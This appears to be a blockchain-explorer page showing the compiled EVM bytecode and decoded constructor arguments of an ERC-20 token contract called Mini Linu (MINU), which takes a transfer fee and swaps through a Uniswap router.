fffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16635c11d7958460008430426040518663ffffffff1660e01b8152600401611012959493929190611c44565b600060405180830381600087803b15801561102c57600080fd5b505af192505050801561103d575060015b50600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156110ab573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110cf9190611cb3565b816001815181106110e3576110e2611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611181959493929190611c44565b600060405180830381600087803b15801561119b57600080fd5b505af19250505080156111ac575060015b50600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71947600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161126a9190611574565b602060405180830381865afa158015611287573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112ab9190611cf5565b6000806000426040518863ffffffff1660e01b81526004016112d296959493929190611d22565b60606040518083038185885af19350505050801561130e57506040513d601f19601f8201168201806040525081019061130b9190611d83565b60015b15611317575050505b5050505b50565b600081519050919050565b600082825260208201905092915050565b60005b8381101561135857808201518184015260208101905061133d565b83811115611367576000848401525b50505050565b6000601f19601f8301169050919050565b60006113898261131e565b6113938185611329565b93506113a381856020860161133a565b6113ac8161136d565b840191505092915050565b600060208201905081810360008301526113d1818461137e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611409826113de565b9050919050565b611419816113fe565b811461142457600080fd5b50565b60008135905061143681611410565b92915050565b6000819050919050565b61144f8161143c565b811461145a57600080fd5b50565b60008135905061146c81611446565b92915050565b60008060408385031215611489576114886113d9565b5b600061149785828601611427565b92505060206114a88582860161145d565b9150509250929050565b60008115159050919050565b6114c7816114b2565b82525050565b60006020820190506114e260008301846114be565b92915050565b6114f18161143c565b82525050565b600060208201905061150c60008301846114e8565b92915050565b60008060006060848603121561152b5761152a6113d9565b5b600061153986828701611427565b935050602061154a86828701611427565b925050604061155b8682870161145d565b9150509250925092565b61156e816113fe565b82525050565b60006020820190506115896000830184611565565b92915050565b6000602082840312156115a5576115a46113d9565b5b60006115b384828501611427565b91505092915050565b600080604083850312156115d3576115d26113d9565b5b60006115e185828601611427565b92505060206115f285828601611427565b9150509250929050565b6000819050919050565b600061162161161c611617846113de565b6115fc565b6113de565b9050919050565b600061163382611606565b9050919050565b600061164582611628565b9050919050565b6116558161163a565b82525050565b6000602082019050611670600083018461164c565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116bd57607f821691505b6020821081036116d0576116cf611676565b5b50919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000611732602983611329565b915061173d826116d6565b604082019050919050565b6000602082019050818103600083015261176181611725565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117a28261143c565b91506117ad8361143c565b9250828210156117c0576117bf611768565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611801602083611329565b915061180c826117cb565b602082019050919050565b60006020820190508181036000830152611830816117f4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611893602683611329565b915061189e82611837565b604082019050919050565b600060208201905081810360008301526118c281611886565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611925602483611329565b9150611930826118c9565b604082019050919050565b6000602082019050818103600083015261195481611918565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006119958261143c565b91506119a08361143c565b9250826119b0576119af61195b565b5b828204905092915050565b60006119c68261143c565b91506119d18361143c565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611768565b5b828202905092915050565b6000611a208261143c565b9150611a2b8361143c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6057611a5f611768565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000604082019050611ade6000830185611565565b611aeb60208301846114e8565b9392505050565b611afb816114b2565b8114611b0657600080fd5b50565b600081519050611b1881611af2565b92915050565b600060208284031215611b3457611b336113d9565b5b6000611b4284828501611b09565b91505092915050565b6000819050919050565b6000611b70611b6b611b6684611b4b565b6115fc565b61143c565b9050919050565b611b8081611b55565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b611bbb816113fe565b82525050565b6000611bcd8383611bb2565b60208301905092915050565b6000602082019050919050565b6000611bf182611b86565b611bfb8185611b91565b9350611c0683611ba2565b8060005b83811015611c37578151611c1e8882611bc1565b9750611c2983611bd9565b925050600181019050611c0a565b5085935050505092915050565b600060a082019050611c5960008301886114e8565b611c666020830187611b77565b8181036040830152611c788186611be6565b9050611c876060830185611565565b611c9460808301846114e8565b9695505050505050565b600081519050611cad81611410565b92915050565b600060208284031215611cc957611cc86113d9565b5b6000611cd784828501611c9e565b91505092915050565b600081519050611cef81611446565b92915050565b600060208284031215611d0b57611d0a6113d9565b5b6000611d1984828501611ce0565b91505092915050565b600060c082019050611d376000830189611565565b611d4460208301886114e8565b611d516040830187611b77565b611d5e6060830186611b77565b611d6b6080830185611565565b611d7860a08301846114e8565b979650505050505050565b600080600060608486031215611d9c57611d9b6113d9565b5b6000611daa86828701611ce0565b9350506020611dbb86828701611ce0565b9250506040611dcc86828701611ce0565b915050925092509256fea2646970667358221220e7a8aed40ee65392e771d762cbd66e07389bc033054192364d7e316229d9ef1664736f6c634300080e0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000fa4f927fc8c0407fec1e716ee786f8ec1a7275e000000000000000000000000000000000000000000000000000000000000000094d696e69204c696e75000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044d494e5500000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063d62126ae11610066578063d62126ae146102a1578063dd62ed3e146102ab578063f2fde38b146102db578063f887ea40146102f757610100565b80638da5cb5b1461021757806395d89b4114610235578063a9059cbb14610253578063c5b37c221461028357610100565b8063313ce567116100d3578063313ce567146101a157806349bd5a5e146101bf57806370a08231146101dd578063715018a61461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d610315565b60405161011a91906113b7565b60405180910390f35b61013d60048036038101906101389190611472565b6103a7565b60405161014a91906114cd565b60405180910390f35b61015b6103bc565b60405161016891906114f7565b60405180910390f35b61018b60048036038101906101869190611512565b6103c6565b60405161019891906114cd565b60405180910390f35b6101a9610515565b6040516101b691906114f7565b60405180910390f35b6101c761052f565b6040516101d49190611574565b60405180910390f35b6101f760048036038101906101f2919061158f565b610555565b60405161020491906114f7565b60405180910390f35b61021561059e565b005b61021f610626565b60405161022c9190611574565b60405180910390f35b61023d61064f565b60405161024a91906113b7565b60405180910390f35b61026d60048036038101906102689190611472565b6106e1565b60405161027a91906114cd565b60405180910390f35b61028b61075d565b60405161029891906114f7565b60405180910390f35b6102a9610763565b005b6102c560048036038101906102c091906115bc565b61078f565b6040516102d291906114f7565b60405180910390f35b6102f560048036038101906102f0919061158f565b610816565b005b6102ff61090d565b60405161030c919061165b565b60405180910390f35b606060078054610324906116a5565b80601f0160208091040260200160405190810160405280929190818152602001828054610350906116a5565b801561039d5780601f106103725761010080835404028352916020019161039d565b820191906000526020600020905b81548152906001019060200180831161038057829003601f168201915b5050505050905090565b60006103b4338484610933565b905092915050565b6000600154905090565b600080821161040a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161040190611748565b60405180910390fd5b610415848484610ace565b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161047291906114f7565b60405180910390a361050c843384600a60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105079190611797565b610933565b90509392505050565b6000600960009054906101000a900460ff1660ff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105a6610cb6565b73ffffffffffffffffffffffffffffffffffffffff166105c4610626565b73ffffffffffffffffffffffffffffffffffffffff161461061a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161061190611817565b60405180910390fd5b6106246000610cbe565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461065e906116a5565b80601f016020809104026020016040519081016040528092919081815260200182805461068a906116a5565b80156106d75780601f106106ac576101008083540402835291602001916106d7565b820191906000526020600020905b8154815290600101906020018083116106ba57829003601f168201915b5050505050905090565b60006106ee338484610ace565b8273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161074b91906114f7565b60405180910390a36001905092915050565b60065481565b600c60009054906101000a900460ff1615600c60006101000a81548160ff021916908315150217905550565b6000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61081e610cb6565b73ffffffffffffffffffffffffffffffffffffffff1661083c610626565b73ffffffffffffffffffffffffffffffffffffffff1614610892576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088990611817565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610901576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f8906118a9565b60405180910390fd5b61090a81610cbe565b50565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60008073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415801561099e5750600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b6109dd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d49061193b565b60405180910390fd5b81600a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610abb91906114f7565b60405180910390a3600190509392505050565b600c60009054906101000a900460ff1615610b2c57610b2b600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d82565b5b6000600654606483610b3e919061198a565b610b4891906119bb565b90508082610b569190611797565b915080600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ba79190611797565b9250508190555080600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bfd9190611a15565b9250508190555081600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610c539190611797565b9250508190555081600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610ca99190611a15565b9250508190555050505050565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600d54811061131b576000600282610d9a919061198a565b905060008183610daa9190611797565b90506000600267ffffffffffffffff811115610dc957610dc8611a6b565b5b604051908082528060200260200182016040528015610df75781602001602082028036833780820191505090505b5090503081600081518110610e0f57610e0e611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681600181518110610e8057610e7f611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050610ee930600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600019610933565b50600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000196040518363ffffffff1660e01b8152600401610f6b929190611ac9565b6020604051808303816000875af1925050508015610fa757506040513d601f19601f82011682018060405250810190610fa49190611b1e565b60015b15610fae57505b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16635c11d7958460008430426040518663ffffffff1660e01b8152600401611012959493929190611c44565b600060405180830381600087803b15801561102c57600080fd5b505af192505050801561103d575060015b50600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156110ab573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906110cf9190611cb3565b816001815181106110e3576110e2611a9a565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611181959493929190611c44565b600060405180830381600087803b15801561119b57600080fd5b505af19250505080156111ac575060015b50600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71947600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600e60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161126a9190611574565b602060405180830381865afa158015611287573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112ab9190611cf5565b6000806000426040518863ffffffff1660e01b81526004016112d296959493929190611d22565b60606040518083038185885af19350505050801561130e57506040513d601f19601f8201168201806040525081019061130b9190611d83565b60015b15611317575050505b5050505b50565b600081519050919050565b600082825260208201905092915050565b60005b8381101561135857808201518184015260208101905061133d565b83811115611367576000848401525b50505050565b6000601f19601f8301169050919050565b60006113898261131e565b6113938185611329565b93506113a381856020860161133a565b6113ac8161136d565b840191505092915050565b600060208201905081810360008301526113d1818461137e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611409826113de565b9050919050565b611419816113fe565b811461142457600080fd5b50565b60008135905061143681611410565b92915050565b6000819050919050565b61144f8161143c565b811461145a57600080fd5b50565b60008135905061146c81611446565b92915050565b60008060408385031215611489576114886113d9565b5b600061149785828601611427565b92505060206114a88582860161145d565b9150509250929050565b60008115159050919050565b6114c7816114b2565b82525050565b60006020820190506114e260008301846114be565b92915050565b6114f18161143c565b82525050565b600060208201905061150c60008301846114e8565b92915050565b60008060006060848603121561152b5761152a6113d9565b5b600061153986828701611427565b935050602061154a86828701611427565b925050604061155b8682870161145d565b9150509250925092565b61156e816113fe565b82525050565b60006020820190506115896000830184611565565b92915050565b6000602082840312156115a5576115a46113d9565b5b60006115b384828501611427565b91505092915050565b600080604083850312156115d3576115d26113d9565b5b60006115e185828601611427565b92505060206115f285828601611427565b9150509250929050565b6000819050919050565b600061162161161c611617846113de565b6115fc565b6113de565b9050919050565b600061163382611606565b9050919050565b600061164582611628565b9050919050565b6116558161163a565b82525050565b6000602082019050611670600083018461164c565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806116bd57607f821691505b6020821081036116d0576116cf611676565b5b50919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000611732602983611329565b915061173d826116d6565b604082019050919050565b6000602082019050818103600083015261176181611725565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117a28261143c565b91506117ad8361143c565b9250828210156117c0576117bf611768565b5b828203905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611801602083611329565b915061180c826117cb565b602082019050919050565b60006020820190508181036000830152611830816117f4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611893602683611329565b915061189e82611837565b604082019050919050565b600060208201905081810360008301526118c281611886565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611925602483611329565b9150611930826118c9565b604082019050919050565b6000602082019050818103600083015261195481611918565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006119958261143c565b91506119a08361143c565b9250826119b0576119af61195b565b5b828204905092915050565b60006119c68261143c565b91506119d18361143c565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615611a0a57611a09611768565b5b828202905092915050565b6000611a208261143c565b9150611a2b8361143c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115611a6057611a5f611768565b5b828201905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000604082019050611ade6000830185611565565b611aeb60208301846114e8565b9392505050565b611afb816114b2565b8114611b0657600080fd5b50565b600081519050611b1881611af2565b92915050565b600060208284031215611b3457611b336113d9565b5b6000611b4284828501611b09565b91505092915050565b6000819050919050565b6000611b70611b6b611b6684611b4b565b6115fc565b61143c565b9050919050565b611b8081611b55565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b611bbb816113fe565b82525050565b6000611bcd8383611bb2565b60208301905092915050565b6000602082019050919050565b6000611bf182611b86565b611bfb8185611b91565b9350611c0683611ba2565b8060005b83811015611c37578151611c1e8882611bc1565b9750611c2983611bd9565b925050600181019050611c0a565b5085935050505092915050565b600060a082019050611c5960008301886114e8565b611c666020830187611b77565b8181036040830152611c788186611be6565b9050611c876060830185611565565b611c9460808301846114e8565b9695505050505050565b600081519050611cad81611410565b92915050565b600060208284031215611cc957611cc86113d9565b5b6000611cd784828501611c9e565b91505092915050565b600081519050611cef81611446565b92915050565b600060208284031215611d0b57611d0a6113d9565b5b6000611d1984828501611ce0565b91505092915050565b600060c082019050611d376000830189611565565b611d4460208301886114e8565b611d516040830187611b77565b611d5e6060830186611b77565b611d6b6080830185611565565b611d7860a08301846114e8565b979650505050505050565b600080600060608486031215611d9c57611d9b6113d9565b5b6000611daa86828701611ce0565b9350506020611dbb86828701611ce0565b9250506040611dcc86828701611ce0565b915050925092509256fea2646970667358221220e7a8aed40ee65392e771d762cbd66e07389bc033054192364d7e316229d9ef1664736f6c634300080e0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000fa4f927fc8c0407fec1e716ee786f8ec1a7275e000000000000000000000000000000000000000000000000000000000000000094d696e69204c696e75000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044d494e5500000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : _NAME (string): Mini Linu
Arg [1] : _SYMBOL (string): MINU
Arg [2] : routerAddress (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [3] : ear (address): 0xfa4f927fc8c0407FEc1E716eE786f8eC1a7275E0

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [3] : 000000000000000000000000fa4f927fc8c0407fec1e716ee786f8ec1a7275e0
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [5] : 4d696e69204c696e750000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 4d494e5500000000000000000000000000000000000000000000000000000000


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.